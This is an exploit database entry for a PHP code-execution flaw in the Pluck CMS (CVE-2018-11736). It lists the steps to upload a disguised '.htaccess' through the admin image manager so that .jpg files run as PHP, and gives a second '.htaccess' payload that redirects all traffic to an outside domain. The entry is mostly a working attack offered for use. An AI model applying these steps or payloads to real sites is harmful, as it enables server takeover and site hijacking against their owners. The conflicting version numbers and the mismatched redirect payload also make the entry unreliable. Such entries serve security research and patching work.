[webapps] Pluck 4.7.7-dev2 - PHP Code Execution

EXPLOIT DATABASE EXPLOITS GHDB PAPERS SHELLCODES SEARCH EDB SEARCHSPLOIT MANUAL SUBMISSIONS ONLINE TRAINING Pluck 4.7.7-dev2 - PHP Code Execution EDB-ID: 52460 CVE: 2018-11736 EDB Verified: Author: CODESECLAB Type: WEBAPPS Exploit:   /   Platform: PHP Date: 2025-12-08 Vulnerable App: # Exploit Title: Pluck 4.7.7-dev2 - PHP Code Execution # Date: 2024-10-26 # Exploit Author: CodeSecLab # Vendor Homepage: https://github.com/pluck-cms/pluck # Software Link: https://github.com/pluck-cms/pluck # Version: 4.74-dev5 # Tested on: Ubuntu Windows # CVE : CVE-2018-11736 PoC: 1） 1. Log in to the Pluck admin panel.\n 2. Navigate to the 'Manage Images' section at http://pluck1/admin.php?action=images.\n 3. Upload a file named '.htaccess' with the content-type 'image/jpeg' containing 'AddType application/x-httpd-php .jpg'.\n 4. Access the target directory (e.g., http://pluck1/images/test.jpg) to execute PHP code with the .jpg extension. 2) .htaccess content: RewriteEngine On RewriteRule .* http://www.baidu.com/ [R,L] [Replace Your Domain Name] Copy Tags: Advisory/Source: Link Databases Links Sites Solutions Exploits Search Exploit-DB OffSec Courses and Certifications Google Hacking Submit Entry Kali Linux Learn Subscriptions Papers SearchSploit Manual VulnHub OffSec Cyber Range Shellcodes Exploit Statistics Proving Grounds Penetration Testing Services